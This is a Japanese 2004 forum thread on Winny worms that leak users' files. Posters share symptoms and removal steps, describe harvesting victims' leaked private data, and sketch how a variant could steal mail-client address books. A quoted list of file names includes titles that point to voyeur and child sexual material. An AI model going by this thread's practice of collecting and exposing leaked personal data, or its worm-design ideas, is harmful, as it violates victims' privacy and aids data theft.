逆にエロのデメリットってこれだけか？

>>155
が何度も追加されていたので、ウィルスを実行するたびに、同じ処理が行われる模様

エロが消えると、生物も絶える。
これは自然の摂理、絶対真理です。
エロ、これ全。

>>170
HIVとか。

>>173
性病があったか。

>>172
「わたしはアルパであり、オメガである」と黙示録も語っています。

苺ｷﾝﾀもｴﾛか

無視リスト推奨の.exe,,0,0,,0,1,0
の　,,0,0,,0,1,0　って何の数字なんですか？

>>177
顔文字

はた

>177
すれ違い


　　　　　　　　　　　(/´△`＼)　Winny総合質問27　Σ(´□｀;)
　　　　　http://tmp4.2ch.net/test/read.cgi/download/1099292027/l50

[私には好きな人がいます］および［私はポート0設定にしております］
の本体を探すのに、少し方向性を変えてみた。晒されるクラスタワードは

[コブクロ][雪の降らない街(11.13発売の最新曲)(1).mp3][MUSIC][MAN][SHIP]
[mp3][三遊亭歌之介][TRICK2　#][041106-0320][【無修正】【裏ビデオ】産婦人〜略〜][(盗撮)]

どうやら、エロゲよりも音楽関係のファイルを落としてる香具師が多い雰囲気
そっち関連で地引継続

とりあえずレジストリエディタが起動できたら感染してないって事ですかね？

なんでｎｙにはウイルス多いのにMXとかは少ないんだ？

またタマツカが踏んでくれないかね

>>183
当たり前だろ。少し頭使えよ。

http://homepage2.nifty.com/dragon-r/

ドラゴン・ロアー
BBSに親切に公表されてるよと報告したのに速攻で消しやがった。

http://www.angelfire.com/ex2/rag_sendai_kintama/
ここの1番下のﾔﾂ。

私には好きな人がいますの手前ってクラスタか？

>>155
[私には好きな人がいます][仙台ギャラクシーエンジェルズ] zip,,100,200,,0
↑
大物狙いで半日くらい地引かけて今のトコ３名。
・今年新卒入社と思われる奴→家族の旅行写真や自分の画像など。実害は低そう。
・エロゲーでワレザーの痛い奴→eS-booksの注文表で本名ばれてる。エロゲーマニア
　と知られて構わないなら実害は低そう。
・九州の自営家具屋(?)→仕事のPCでnyなんかやるな！本人や家族の情報は自業自得だが
　施工した顧客の情報が100以上も一部現場画像付きで流出。これが一番ヤバイと思われ。

［私はポート0設定にしております］で、大量の家族写真を含むのを地引
写真好きのスキルの低いおっさんだと思われるが、nyなんかやるなよ(w

そういやポート0を蹴ってるんだった、とりあえず取り込んどこう
（ちなみに、ny本体にも手を入れた観測用システムなので、検索能力は低いんだが）

今回のもユーザの脆弱性を巧みに突いたって事だな
つか踏んだ香具師大杉ｗ

ところで「エロの前には辛抱堪らん」てのは人類最大のセキュリティホールだよなぁ
意図的に設置されたバックドアかもしれんが

健児ときょうこは兄弟ですか？恋人ですか？

[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] セイミ [04-11-02]（ファイル詰合せ）.zip
↑
ウイルスしか入ってないよ

>>182
本体ではなく、それが撒き散らすzip内のscrを踏んでみたけど、
regedit.exeもregedt32.exeもちゃんと起動したよ。

ウィルス本体と、それが撒き散らすのは、中身が違うのかな・・・。

面白半分で仙台ギャラファイル見ようとしたら.scr偽装の亜種だった。不覚だ…
でも俺の環境ではなぜか発動しなかったぽい。
即効で削除しようとしたがなぜかマイドキュメントが絡んでて削除できなかったので、
タスクマネージャでマイドキュメントを終了させて削除した。

マイドキュメント.scr 入ってるのは捏造と思ってた

面白全部だろうが

キンタマも苺キンタマも　>>194のように２次感染したマヌケなヤツが結構いた

普通に寸止めだった。あびねぇ

だからよ、面白半分で落とすなよ。

nyやってて感染した馬鹿は自業自得だが、そいつに巻き込まれる罪の無い人間もいるわけだろ？
九州の家具屋の顧客みたいに。
お前らが落とすことによってお前らのPCからまたばら撒かれるじゃねぇか。

落としたらキャッシュ消せ。

黒木さんの犬(大きいほう)の写真、かわいかったー。

人間は正直見ちゃいけないと思った。プライベートだからね。

そんなもん顧客がその会社を見る目が無かっただけで、自業自得だろうがボケ。
だいたいダウソ板で善人ぶるやつはウゼーんだよ

俺の場合、マイドキュメントのファイル名を変えていたのが効をそうしたらしい。
これまでに挙がっているチェック項目はすべてシロだった。

>>201
omae ga uzai

追記
ルートディレクトリに怪しげなＶＢＳ何たらが生成されてたので削除した。

総合質問スレとり誘導されてきました。

キャッシュのチェックをしたら
仙台　ギャラクシーエンジェル　俺のデスクトップ　〜（自分の名前）
みたいな名前のファイルが大量にあって、
今まで無かったUpフォルダがあったのですが、
これは>>8にあるウイルスの一種なのでしょうか。

winnyのフォルダを開いてもUpフォルダは無いし、
画面上出ているUPフォルダもキャッシュにあったら奴も全部削除したんですが
これで解決しましたかね？
あといつウイルスにかかったかも検討つかないんですが。

またファイル名を指定して実行→c:\windows\win.ini
をしたところ英文字の羅列は出ましたが「ぬるぽ」とは入っていませんでした、

ドラゴンロアーは今何やってるんだろうｗ

>>205
>>38

>>205
誘導されてきたのなら、ここは質問スレではなく
自己学習スレだと見当が付いただろ？ 前スレなり、1から嫁

すんません。あんまり詳しく無いんですが、
とりあえずコレやっとけば大丈夫っての無いですか？
ＯＳの再インストールは共有ＰＣなもんで辛いのですが。

とりあえずnyは終了させておけばこれ以上広がらないと思うが、
もう広まったファイルは永遠にnyネットワークに流れたままだろう。
対策は>1から読めば分かる

>>209
共有PCでなに割れエロゲで遊んでんじゃ

共有PCでNYをやるのも大間違い

>>209
ワクチンソフトが対応するまで待ってから駆除。
「とりあえずこれ」って程度でどうにかなるなら、こんなに
騒いだりしないよ。共有PCでnyなんてもってのほかだし。

いやー肝を冷やしたよ。
scrファイルをダブルクリックしちゃったから感染してもおかしくない状況だったのに。
もっともスクリーンセーバ型はそんなに悪質じゃないみたいだけど。

え？ぶっちゃけ　スクリーンセーバ型の亜種の方が悪質だぜ？

>>215
そう？
>>10見る限りたいしたことないようにおもうんだけど。

>>209
とりあえずコレ＝再インスコ
最強


>>214
キンタマの時も「ごみ箱.exe」踏んでも何ともねーってふんぞり返ってた香具師居たよな
時限機能発動後に大慌てしてたみたいだけど

なんだかんだで暖かい対応サンクスですｗ
ひとまずnyと別れる良い機会だと思ってみます。

ウイルスかかるなんて人事だと思ってたんだがなぁ orz

>>38にある駆除方法の一番上は分かるんですが
下三つの
・CDなどから正常なレジストリエディタに戻す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに追加されたキー削除。
・UpFolder.txt、Download.txtの問題箇所修正削除。

というの誰かご教授きぼん。暇な時で良いんで。
ny切っておけば問題は無いのでしょうが。

948 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/11/06(土) 09:33:20 ID:sdtiaq3b
[日付-時間][***][***][***][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

この手のの中身は、.txt　.doc　.xls　.jpgをディスクの中からサーチして
片っ端からパックして流すタイプらしい。割と新しい亜種だと思われ…

かなり危険だなぁ。こりゃ。.jpgの中には破滅画像が含まれてる
（自分で自分自身のナニを撮影したと思われるマヌケな写真）
しかも、メール送受信キャッシュ（.txt）も含まれてるし…個人情報垂れ流し
感染者は…ご愁傷様


スクリーンセーバーの拡張子の便乗亜種はこれな>>216
>>10じゃなくて

仙台ウイルスのスクショ集めにこってるの俺だけですか？ぐひひ

とりあえずうｐゼロにしときゃいいんだろ？

>>218
ケーブル引っこ抜くといいと思うよ

いったいどうして踏んでしまうのだろう。

Cookieについてる名前から明らかに女性なのに、エロゲ?
いや、エロゲやる女の子はいるけどさ・・・。

>>223
手口が巧妙だからなぁ…
オートランだし、まぁ仕方ないと言えば仕方ないけど、
女がエロゲやるのにWinnyって激しいなｗ

ウイルススキャンするだけの奴とか、既出の対策しただけで平気だと思ってる奴ってめでたいな。
対応してなかったらスキャン意味ないし、プロが考えたわけでもない対策しただけで
なんで平気だと思えるんだろうね。

>>218>>221
取りあえずお前らの個人情報が漏れたとだけ言っておくよ。
残念でした。
うｐ0でもうｐしますから。

>>223
上にも出てるけど音楽関係だと思われ。

>>219
その前スレの948は漏れなんだが、一部修正
メール送受信キャッシュ（.txt）というより、主にCookieだな
とにかく全サーチかけてるっぽいので、負荷がかかればすぐに判明しそうなんだが

スクリーンセーバ拡張子の便乗型では、上記症状が発動しない（少なくとも俺は未確認）ってのと
その便乗型の内部コードさらっても［私には好きな…］とか［私はポート0設定…］の
文字列はヒットしないんだよ。ということで別物だと思う。今、本体を探してるんだけどね。

とりあえずオートラン切ってマウントからスキャンにかけて、
setup実行前に最低でもレジストリのﾊﾞｯｸｱｯﾌﾟくらいとっておけば
あとは何とかなるだろ、キンタマや苺や仙台ならの話だが。

windows\system32の中のsvchost32.exeって奴を消そうとすると
フォルダの削除エラーと出て削除できないんですが。。。

>>225
upfolderが生成されてないのになんでうｐされるんだよ。
そもそもwinnｙフォルダにupfolder.txt自体ねーよ。

Upfolderなんか無くとも、キャッシュファイル化できてればUPできるよな

キャッシュもとっくに調べたよ。
お前らあんまり脅かすなよなｗ

>>231
流した後にキャッシュ消すタイプならどうする。つか、あきらめれ

開き直ったままの方が楽しくていいじゃない

まあいいじゃないか。好きなだけエロゲできるんだから個人情報くらい。
やふーで流されても５００円だぜ。コンチェルトしか買えねぇ。

今気付いたけど、いやなIDだな DLにLZHかよ

>>231
そう思ってればいいじゃん。
スキャンして反応あればいいけど反応なければ
新しい亜種って事なんだから何があるかわからないし。
やっぱこーゆー奴が感染するんだなぁ。
>>229みたいなレスするくらいだもんな。
まぁ、元々.scr偽装なんかに引っかかるアホだからしょうがないのか。

個人情報をキャッシュ化してからうｐするウイルスなんて存在しねーだろうが。
なめんなよ！

噂聞いてdown板にやってきたがキンタマの時ほど全然大騒ぎになってないじゃん。
みんな対策ばっちりでこの程度のウィルスにはやられなくなってるのかな？
やっぱフォルダ偽装ってのがポイントだったのか。
しかし、焙煎スレはツワモノ多いよなぁ、逮捕者出ようが、ウィルスが広まろうが、
そんな話は微塵も出ずにエロの話に終始してるもんなぁ。廃人達の集まりにしか
思えん。

>>237
なんで存在しないと断言できるの？

>>237
だからー言ってんだろ。既出の情報だけ信じるなって。
亜種なんだよ亜種。
お前が踏んだのがキャッシュかしてからうｐするウイルスだったらどーすんの？
例え表で何も悪さしてないように見えても他に隠れてなにしてるかわからんのよ？
前のがいい例だろ。対策ばっちしとのほほんとしてた奴らが時間差であぼーん。
そんなウイルスだったらどーすんの？
よく開き直られるな。

人ごとだと思うとチョー楽しい。

で、ジョン様はもう過去のウイルスですか？

かなりアホなこと聞くけど、ギャラクシーの晒されたJpg自体はみても安全なんですかい？

>>243
たぶん、今のとこは…システム的にはそんなに危険じゃない（jpegの脆弱性については対策しとけ）
そのうちjpeg偽装のexeが混在してくる予感。見たことによる健康的な危険（気分が悪くなるとか）
および社会的な危険（見てはならぬものを見てしまう）は未知数。あえて収集しないことを薦めるが…

引っかかってる連中見てるとウィルス感染を察してもnyは止めないってところが
馬鹿というかなんと言うか…

exe ファイル 捨てたい
(応答なし)

外に投げ捨てろ

>>245
ID:FajhENk7見たいにテンプレに書いてあること全てやって
症状なくなったから平気だと思ってｎｙ起動しちゃうんでしょ。
壁紙が変わってるのにｎｙやってる奴は問題外だけど。

>>244
どうもです。

収集じゃねーんです。おれもユーザー名Adminにしてるから不安になって一枚見たんです。
いくら一般的な名前とはいえ大文字小文字の位置まで完全一致だから。
検索にも大量にかかった(無視されなかった)し、regeditは生きてたし、
Regの中身みても、ノートンしかいなかったんでまあ大丈夫かなとは思ったけど。
(そもそも「レジストリエディタをメモ帳で上書き」ってどういう状況かがわかんないけどまあ普通に起動はした。)

まあ、俺の受けた市外は精神衛生上ってとこなのかな。今のとこ。

×市外
○被害
どんなミスやねん。

>>238
キンタマは発想が画期的だった
今でてきてるのはどれも二番煎じだから対策は見えてるんで騒ぎにはならない

グリーングリーン２とラグナロクオンラインをやってるやつが多いな・・・

とゆーか、ネトゲやってる奴終わってるよな。
どうせROなんかだと面白がって本スレに貼ってる奴とか居るんだろ？

svchostの削除が出来ないorz
テンプレサイトに飛んで確認したやり方、

ファイル名を指定して実行
del C:\windows\system32\svchost32.exe
"del" C:\windows\system32\svchost32.exe
'del' C:\windows\system32\svchost32.exe

のどれでも削除できないです。
誰か救済を orz

>>249
いや、WinXPユーザーなら、誰でも（90%以上のユーザーが）Administrator
のログインアカウントを持ってるのだが…。そーゆーことも知らんで
地引するのは、ちょっち危険だわな。

>>235
ついでにLPが入ってるとこみると炉好きの古強者でつか？


>>250
江戸っ子ﾊｹｰﾝｗ

>>255
俺のOS違うんで…。

>>254
Safeでもだめ？
俺もどっちかというとここではかなり素人なもんで、俺より詳しい人沢山いると思うけど、
夜中だし急を要するなら削除支援ソフトはどうかと。

俺は削除で困ったらコマンドプロンプトとかそういうのが苦手なので
フリーウエアの力を借りるが、
ブートの時にウイルスに先制攻撃できるかは知りませんよ。
先にウイルスが動き出して削除できないんではどうしようもない。


自己責任で。
転載許可がないのでファイル名とReadmeの最初のみ(検索されたし)

SRCpy for WIN32 Copyright (C) 1997-2004 KAZA


SRCpy は拙作 WWatch for WIN32 補助ツールとして作成されたフリーソフト
です。

Windows 起動中には「共有違反」でコピーや削除出来ない共有ＤＬＬ等のフ
ァイルが存在します。SRCpy は、このようなファイルをコピーや削除するた
めのツールです。

システム系ファイルを変更または削除すると最悪の場合は、システムが起動
できなくなる場合があります。このため、SRCpy の処理内容を理解した上で
使用してください。

SafeってSafemodeです。Safenyとかじゃないんで。
わかると思うけど。

バスターのアップデート情報全くなし・・・ ﾁﾝ☆⌒ 凵＼(＼･∀･) まだぁ?

>>254
・セーフモードで消す
・コマンドプロンプトで消す

つか、delをクォートで囲んでるのはどーいう了見だ？ｗ
囲むならパスの方をダブルクォートで囲んどけ

>>259
こんな犯罪者しかかからないウイルスに対応する必要なし

一晩でﾚｽ結構伸びたけど
なんかあったの？

>>262
おまえんちさらされてるぞ

仙台見ててひとつだけ気になったので報告
もう消したから誰の奴か憶えてないけど
クラック使用と思われるup0のSSが流れてたから安心しない方がいいよ

>>226
スクリーンセーバの奴でも、
%SystemRoot%\System32\network下にできたファイルを見ると、
Cookie総ざらえされてましたよ。

>>254
とりあえずさ、
ココきて質問してるやつ全員にいえるんだが


　　　
　　　前　ス　レ　ぐ　ら　い　読　め　！　！



余談だが、ＮＯＤ３２やっと対策でたよコンチクショウ！
亜種対応はぁゃιぃけどな
ライセンス切れたら博士に戻ろう.......

>>254
それ消して死んでも知らんぞ。

>>265
収集してzip化には、発動条件があるみたい（うちのは未発）

で、それだけでは［私はポート0…］とか［私には好きな…］とかへの
ネーミング＋ny放流機能がないので、複合感染して発動するのか
それとも外部からポート直接叩いて拾っていくのか？　今のとこ分からん
（Y!BB回線ユーザーなどグローバルIPが直接来てるユーザーは狙われるかも）

地引でひっかかったのは、数名（4名ぐらい）に留まっているので、スクリーンセーバー偽装を
踏んだ香具師の数からすると、少なすぎ。いくつか偽装ものも拾ってみたけど、バイナリが一致
するので、同じものが流されてる。うーん。今日はこれで寝落。

>>266
先生は昨日（一昨日？）にW32.SillyP2Pとして識別済み。スクリーンセーバものは未対応

SillyP2Pかｗ
いいネーミングだな

詰合せゲト……( ﾟДﾟ)ﾊｯ

\My Documents\マイ ミュージック\かっとばせヌルポース.wav
\My Documents\My Pictures\ジョン様.bmp

とても気になるのだが、例のサクーシャ仙台感染かネタか……ネタだろうなぁ

>>269
MPFCのSilly Walkを思い出したり
俺も歳だな　orz

私には好きな人がいますを4つ落してみたんだが
ウイルスらしきものがない。JPG偽装なのかそれともWORD偽装なのか。
WORDなら開けたらぬるぽと書いてあるのがあやしい。

PCに本名とか入れる奴の気が知れない。
さらには、自分が男であるのにPCに女性の名前を入れるのは、もっと気が知れない

>>273
家族の名前って考え方はできんの？

世話になりました。
仕方無いんでウイルス踏んだってことを告げて再インスコできることになったｗ
もちろんウイルス名は適当に繕いましたがｗ

これを期にny止めて真っ当に生きようかな…

>>275
nyやめるなら再インスコしなくてもいいでしょ。
苺キンタマと違いnyでしかファイルを上げないわけだから
しばらくすればアンチウイルスソフトも対応するだろうし。
にもかかわらず再インスコするというのは何故か・・・
やはり気持が悪いから？
否
ｎｙを止める気が無いからだ！

仙台GAも完全に解析された訳じゃないからなぁ
キンタマだって初期は晒しだけと思われてたけど、DATA破壊とかACCS砲とか有ったしさ
それに罹ってるのが仙台GAだけとは限らんだろ、書き込みの具合からして

つー事で再インスコは至当だと思ったり


ま、止める気云々は概ね同意だけどな

ノートンでスキャンしたら、
「感染は見つかりませんでしたが、いやらしい画像が見つかりました。」
って出ちゃうんですけど、これってどうなの？

マイドキュメント.scrをゲット
バスタ2005検出せず。AVGは検出。

やっと対策キター
ｗ32.ｓｉｌｌｙＰ2Ｐだってさーーーーーーーーーーーーーー

漏れがシマンテクに送ってやっと対策してくれた

>>281
乙

>>280
あーあお前、シマンテックがKに通報して
逮捕だな

>>251
解凍後start upにぶちこむぬるぽーすのほうが画期的だろ。
あれはﾜﾗﾀ。

>>281
Z

>>281
TZ

>>38
ttp://www.geocities.jp/kemkzuenc/Antinny.html

とりあえず久しぶりに更新

つかさ、ワクチン会社だってソフトハウスな訳よ。
感染者が違法行為をやってる連中だって確定してるウィルスのワクチンを
速やかにリリースすると思うかね？
むしろ出来るだけ放置しておいてやろうってのが人情でしょ。
だいたい、今まで散々人を殺したテロリストが
自分が怪我をした時は病院へ駆け込んで行って
「助けてぇ〜」みたいなもんだからな。
みっともないったらありゃしない。
ノートンは外人だから、そこら辺の人情の機微をわかってないんだろう。

>284
同意。P2Pの怪しいファイルとアーカイバDLLの脆弱性との合わせ技１本って感じだ。

>>288
ただ、言えることは
速やかにリリースしないと自社のマイナスにつながることは確かだな
そういう意味ではノートンが一番ソフトハウスだ
ノートンが外人だと言うなら他も外人だがな....

Ny利用者を晒すのは違法なのか？
ある意味正義の味方だと思うんだが
晒された奴は自業自得だからワクチンなど無用

と、金玉に引っかかった奴がこう申しております。

>>291
結論から言うと違法だ、日本はそんな国だ
感情から言うと正義の味方だが　　　違　法

自業自得だが金儲け考えるならこんなウイルスにも対応しないとな
そんな香具師が晒された結果買うだろ？
商売なんてそんなもん

バックアップソフト？

自社のマイナスね・・・少なくとも、今回の件はエロゲが感染源なんだよな？
エロゲをny落としている奴が、アンチウイルス系のソフトに金を払っているとはとても思えないのだが。

俺もワクチンは無用だと思うよ。その程度のリスクはあって当然。

>>290
ソフトを違法に導入してる連中からの評判が良くなったところで、
nyでの参照数が増えるだけでしょ？
P2Pのウィルスは放置で一向に問題ないと思うが。

それどころか京都県警には是非、
P2Pのウィルスは放置するようにとワクチンメーカーに通達を出して欲しい。
犯罪幇助ってことで、得意のいきなり逮捕でも構わないけどさ。

>>295
まー事実SS見る限りじゃAV動いてる香具師いないな（笑）
つまりそいつらが新規顧客ってことだ
今回のもそうだがレジ見張るツールあれば感染したことは一発でわかる。

て、だんだんスレ違いになってきな

この板で、296は何言ってるんだ・・・（＾＾；

エイズ患者は同性愛に特有の病気だから自業自得、
治療なんてしなくていい、みたいなもんか。
でも輸血やら異性間性交渉でも感染するんだよな。
Ｐ２Ｐのもｎｙやってない人にも感染したら困るよな。
そう考えると対策せざるを得ないんじゃないの？
自宅ＰＣを子供につかわせといたら
感染してましたとか。
ｎｙ感染者当てのメールがさらされた第三者とか。

案外ソフトベンダー関係者が個人的に開発してたりしてな
それともただたんなる愉快犯かな
だとしたならばかなりの暇人だね

P2Pユーザを保護するのは結果的にP2Pによる違法行為を幇助することになる
もっともアンチウィルスソフトが対応してもNy利用者が購入するとは思えないけど
>>299
確かに非利用者が踏まないとは限らないから対応は必要かもね
結局被害を被るのは無関係の第三者で儲けるのはワクチンソフトベンダーということか
自作自演の匂いがプンプンするね

>>300
こことか、WinnyでSS見てﾆﾔﾆﾔしてんだよきっと

>>297
>まー事実SS見る限りじゃAV動いてる香具師いないな（笑）

某記事の中に
「アンチウイルスソフトのスキャンを行っている最中の画像が多数見つかっている」
とあるんだけど？
まぁ・・どう考えても新規顧客にはならないよ。
nyで落とすフリーのを使うだろう。

>>303
オラインスキャンとかライセンス切れだろ
○○のAVが対応速かった、○○最強
とか言いふらしだすのよ、
など希望的妄想してみる

まーヒッカルやつはバカなのは確かだな

仮にさ、ソフトハウスがウィルスしこんで放流してもなんら痛みはないよね。
頭の悪い、泥棒がひっかかるだけで。
そりゃ違法かも知れないが、誰が被害届だすんだよ。
違法ソフトをＰ２Ｐで手に入れて、実行したらＰＣがやられて、個人情報晒されましたって
警察にいってＨＤＤを証拠として提出するわけか？ｗ
せいぜい刑は罰金程度だし、逆に民事で巨額の損害賠償請求されそうだｗ

だんだんスレ違いになったからもう同でも言いこと書くけど
「ｗ」って語尾につけると、どんなにえらい言っても説得力無いよな

誤字も説得力ないなorz

>>306
お前だけだ

で、新型情報まだ？

これでゲームCDのautorun+startupという前例が出来たわけだけど、
次はisoのエロDVDにでも仕込んでくるかね？
光も普及してきたし、仕込み先のファイルサイズはあまり関係なくなってきたか。

初歩的な質問で恐縮なんだが
キンタマとかexeに潜んでるウィルスの事なんだけど
あれは、製品のexeプログラムにウィルスが感染するのか
exe自体がウィルスのプログラムなのか誰か教えてくれ

次は普通にセットアップ画面が出てインスコできるけど、同時にウイルスにも感染…というのが出ると予想してみる。

手段はどうあれ、エロで釣るのは確定だな
isoエロDVDのVIDEO_TSフォルダに偽装するのはどうだろう
再生できなくて不審に思って開く人いないかね？

>>311
今回のは両方だと前スレには書いてあったが？
俺が確認してるのはウィルス単体だけ

>>314
ﾚｽどうも
いちを前ﾚｽから全部見てたつもりだが見逃していた

trojanなんかの手法でエラー情報吐き出させて裏で実行ってのはよくあるらしい。

http://tmp4.2ch.net/test/read.cgi/download/1099799904/l50

日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。

漏れ以外にもC:\wingoフォルダ出来た椰子居ますか？

>>319
またお前か。懲りない奴だなｗ

ウイルスは基本的には実行ファイルを実行
しなければ感染はしないんですか？

>>321
ﾛｸﾞ嫁

>>319
ﾉｼ

>>319>>323
WORM_BAGLE.ATにやられてるんとちゃうか

圧縮型のファイル開かなければ無問題って事でしょうか？

タスクマネージャー見たけどwingo.EXEは起動してなかった。。
ノートン先生に見てもらったんだけどね。

再インストールする場合、ノートンのキーはまた購入しなきゃいけないの？

setup.exe踏んだら変なＩＤとパスワードのウィンドウが出てきたよ。
本当にやってるか分からなかったが、裏でドライブＣのデータを削除しようとした。

テンプレから考えるとautorunタイプの亜種のように思える。
隠しUpフォルダは作成されてないが、system32にsetup.exeを確認。
キャッシュに作るタイプか時限式で発動かもしくはフェイクかな。

さすがに日曜の午後ともなると、生暖かい香具師が多いな

[041106-2153][(ショタ・堂山)　ぼくのパンツどこ完全版＊交換用.mpg][(ショタ)[堂山]ゆうたシリーズラスト＊交換用.mpg][[ロリータ]妖精伝説][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041105-0301][mp3][三遊亭歌之介][TRICK2　#][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041105-2105][コブクロ][-][雪の降らない街(11.13発売の最新曲)(1).mp3][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041106-1404][(映画)][-][バトルロワイヤル.avi][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041106-1809][松浦亜弥【LIVE】(DVD)][コンサートツアー2003][春松リングPINK][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041106-0320][【無修正】【裏ビデオ】産婦人科医麻酔盗撮　１９才CMモデル（１３分２１秒][217kbps）.rm][(盗撮)][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041106-1658][服脱ぐなよ・・・][服脱ぐなよ・・・][服脱ぐなよ・・・][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

[041106-0035][.zip][.avi][ドラマ][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041106-1850][【無修正】][一本道][-][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041104-1040][秋の童話　18話][いま　会いにゆきます][[韓国ドラマ]][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041107-1115][奈美１２歳][木村パパ][mama][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041107-1250][映画][木村奈美][女子中学生][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041104-1154][谷村聡美][谷村　聡美][][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041104-1749][ゆず][-][友達の唄.mp3][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
[041104-2018][It's][eshop][Arc-shop][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

aikoの花風を落としたらアンチｎｙのAだった

今必死で消してるとこ

シングルなのにZIPって初めてだったんだけど、
これってよくある流し方なの？
とりあえず歌はちゃんと入ってた
でも歌も消すかな、むかつくし

system32のsetup.exeってやばいの？
これってＸＰのコンポーネントインストール用でしょ。

>>333
ｸﾘｯｸ!ｸﾘｯｸ!

俺はファイル共有やらないから"あんまり"関係ないな。
でもこーいうウイルスってどんな奴が作ってるのかね。
デブヲタのキモイやつなんだろうか。

>>334
クリックしたけどＸＰのコンポーネントインストールはコントロールパネルからやれ
と表示されただけ。

アンチウィルスベンダーはさ、
winny自体をトロイの木馬として除去すりゃいいんだよ。

>>337
お姉さん、スルドイ！！

歯医者さんが虫歯の根治方法を見つけたとしてそれを発表するだろうか？

nyを消すウィルスとして（ｒｙ

Nyを削除してもコンピュータウィルスの根絶にはならないと思われ

どちらかというと、落としたものを削除するほうが

ν即から紛れ込んだのか知らんが、明らかにダウソの住人じゃないヤツが数人いるな。
それとも携帯から書き込んでるのか？
日曜だから仕方ないと言えば仕方ないけど。

普段からhijackThisでログを取っとくことを勧める。
いざというとき役に立つ。

香ばしいのが多くなったね・・・

pokotin.exe・・・・・
ぐぐっても詳細わからないお(・∀・)

system32にshare.exeってのができてる。
ウィルス作ったのってShare厨じゃないの？

>>347

・・・・・・

ny使っていなくても、ウィルス対策ソフト常駐、OSユーザー名は本名にしない、
プライバシー情報はデスクトップに置かず出来れば別HDDに置く。
これはPC使用する上での常識だろう。
まあ、nyユーザーで感染する人は殆ど居ないだろうが。

ユーザー名変更したけどスタートメニューの所しか
変わらないんだけどアカウント作り直さないと無理ですか？

にやにや

メアド収集してデスクトップとNy利用情報をメール送信する亜種よろしく

>>339
もう発表されてる

>>353
それはスマートじゃないな。

デスクトップに動画ファイルとか置いてあったら、800メガとかのメール
が無差別に送信されまくることになる。メールサーバとネットにかかる
負荷がでかい。公害。大多数に体感できる迷惑をかけると愉快犯と
みなしてもらえないし、メル鯖に損害があったら、プロバイダもそれなり
に攻撃的な態度で応じるだろう。

より身近な問題として、いきなりギガサイズのメールが複数届いて自分
のメールボックスが満杯になってたりするのは嫌、って話。

あくまでny上でやるからこそのキンタマ。

>>339
する。
なぜなら当人はそれで歴史に名を残すことになるし、一生それで
食っていける。歯科医療は齲歯の治療だけじゃないしな。

町の歯科医は困るかもしれないが、それは発見者には関係ない。

>>355
SSって書くの忘れたてた。スマソ

>>357
サイズの問題がなくても、いきなりメールが送られてくるなんて
うざいことこの上ない。メールで感染する亜種が登場するのも
予想範囲内。

あくまで「nyやってない人には（おおむね）関係ない」「そこはかと
なく自業自得っぽい」からこその「愉快犯っぽいイメージ」がある
んだよキンタマは。

メアド抜くっていっても
outlookかぐらいしか抜けんだろメアドをレジストリに書き込んだりするわけじゃないから

>>359
ローカルのプログラムとして動くんだから、普通に標準的なメールソフト
のアドレス帳を自動検索するだけでそれは可能。メールソフトが他の
メールソフトのアドレス帳をインポートするのとかわらない。

だからOutlookと同Express、Becky、Netscape/Mozillaメール、Eudora、
あとShurikenとか電8とか主だったの10種類くらい対応しとけばあらかた
やれること。

ひっかかるのは初心者が多いからだいたいOutlookだけでいいんだろ
うけどな実際は。

>>350
別のHDDに置くってあるけど
そのHDDがPCにつながってる限り危ないと思うぞ

「いきなりメールが送られてくるなんてうざいことこの上ない」
信用破壊には十分すぎる効果がありそうですね

>>359
outlookだけで大丈夫でしょう
確実に発症しなければいけないですか？

>>350
普通はリムーバブルディスク（フロッピーやMO）で保存するだろ

>>332
初歩すぎて誰もコメントしないから私が…。
感染者が持っているZipファイルにウイルスのExeファイルを追加してるだけ

落としたZipファイルの中に怪しいExeファイルがあっても
それを削除すれば後はとくに問題ない…今のところは。

シングルなのにZipなのはカップリングやカラオケ等収録曲全部入れるよくある手段

>>362
自分がうざい思いをさせられるということを全く想定していない

だってネットでメールのやり取りをしてくれる人がいないんだもん

>>351
http://homepage2.nifty.com/winfaq/w2k/hints.html#1247

>>364
よこから質問失礼します
zipの中にexeウィルスがある場合
そのzipを解凍した時点では感染するんでしょうかぁ？
それとそのzipをダブルクリックして中身を観覧した場合も感染しますかぁ？

>>368
しません
そんなこともわからないならWinnyすな！

すまん。俺が悪かった。
ここは質問スレじゃないし…。

そんな初歩的な質問は然るべきところでしろ

>>366
代理レスありがとう
雑談であそこまで真剣になるなんてあやしいね

厨密度高すぎ・・・

センスあるやつならいいんじゃないかな。
一般人を巻き込まないですむやつ。

>>369
まじですまんかった_no
でも、どっかでアーカイブのセキュリティーホールをついたウィルスが、どうのこうのって聞いたので不安だった
ちゃんとwindowsアップデートしてれば問題なしなのかな

>>374
>>369は馬鹿だから、信じるな。キミの知識が正しい。

しかし、いまだに対応できていないウイルス対策ソフト様各位はいったい何を・・・・・

故意に対策しないのか？

>>376
幼稚な陰謀論はこうして生まれる、というサンプル

>>375
Winrar使ってない限りZipウィルスにはかかりません
古典zipウィルスは下火だしな

Ny起動してなきゃ派手な被害はないから放置でもNP

書庫圧縮するウイルス出た時に
